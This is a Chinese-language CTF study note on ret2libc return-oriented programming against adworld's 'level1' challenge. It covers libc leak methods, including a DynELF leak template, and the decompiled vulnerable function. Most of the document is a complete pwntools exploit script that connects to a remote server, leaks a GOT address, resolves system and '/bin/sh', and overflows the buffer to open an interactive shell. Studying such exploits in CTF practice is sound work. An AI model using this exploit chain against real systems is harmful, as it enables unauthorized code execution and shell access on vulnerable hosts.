【pwn】ROP--retlibc

ROP中对retlibc技术的一些学习心得

漏洞利用思路：

1.找到泄露库函数地址的漏洞，获取libc版本（因为一般不会给你libc.so文件）

查询libc版本一般有三种方法：
1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入
通过libc.dump('system')可以得到system函数的偏移，libc.dump('str_bin_sh')得到binsh字符串的偏移
2.pwntools自带的Dynelf，需要先构造一个leak函数和一个可以不断触发溢出的漏洞		

一个模板：

def leak(address):


  #各种预处理


  payload = "xxxxxxxx" + address + "xxxxxxxx"


  p.send(payload)


  #各种处理


  data = p.recv(4)


  log.debug("%#x => %s" % (address, (data or '').encode('hex')))


  return data


d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 


systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

	3.在线查询网站，通过函数的后三位数值查询。https://libc.blukat.me

典型的题目–adworld里的level1（非常典型的retlibc）

源码：

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);			
  return read(0, &buf, 0x100u);		//溢出点
}

exp：

from pwn import *

from LibcSearcher import LibcSearcher

context.log_level='debug'

#sh = process('./level1')
sh=remote('111.198.29.45',42536)

writeplt= 0x08048370
readgot=0x0804A00C
vuln=0x0804847B



payload = 'a'*0x8c+p32(writeplt)+p32(vuln)+p32(1)+p32(readgot)+p32(4)

#gdb.attach(sh)
sh.sendline(payload)

readaddr=u32(sh.recv(4))
print(hex(readaddr))
libc = LibcSearcher('read', readaddr)
libcbase = readaddr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload='a'*0x8c+p32(system_addr)+'a'*4+p32(binsh_addr)
sh.sendline(payload)




sh.interactive()

sh.close()

笔记:

context.log_level='debug’开启调试模式